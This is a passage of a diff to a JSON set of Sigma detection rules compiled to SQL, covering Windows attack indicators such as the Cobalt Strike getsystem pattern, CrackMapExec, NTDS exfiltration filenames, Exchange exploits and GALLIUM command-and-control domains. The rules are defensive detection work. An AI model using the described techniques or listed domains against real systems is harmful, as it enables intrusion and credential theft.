((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ 
- "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" - ], - "filename": "win_codeintegrity_blocked_driver_load.yml" - }, - { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE 
'%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_rdp.yml" - }, - { - "title": "NTLM Logon", - "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", - "status": "experimental", - "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "falsepositives": [ - "Legacy hosts" - ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_auth.yml" - }, - { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", - "status": "test", - "description": "Detects common NTLM brute force 
device names", - "author": "Jerry Shockley '@jsh0x'", "tags": [ "attack.credential_access", - "attack.t1110" - ], - "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" - ], - "filename": "win_susp_ntlm_brute_force.yml" - }, - { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", - "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" - ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" - }, - { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", - "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", - "tags": [ - "attack.lateral_movement", - "attack.t1210" - ], - "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" - ], - "filename": "win_exchange_cve_2021_42321.yml" - }, - { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", - "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", - "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "status": "experimental", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Any powershell script that creates bat files" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', 
'8007', '8022', '8025'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", - "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ - "attack.lateral_movement", - "attack.t1021.004" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate administrator activity" + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + 
"filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "TeamViewer Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects the creation of log files during a TeamViewer remote session", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate uses of TeamViewer in an organisation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. 
This could be a sign of attackers abusing OneNote attachments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - "filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath 
LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE 
(Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM 
logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' 
OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Windows Defender Threat Detection Disabled - Service", - "id": "6c0a7755-6d31-44fa-80e1-133e57752680", - "status": "stable", - "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", - "author": "Ján Trenčanský, frack113", + "title": "Dynamic CSharp Compile Artefact", + "id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "status": "test", + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027.004" ], "falsepositives": [ - "Administrator actions", - "Auto updates of Windows Defender causes restarts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 
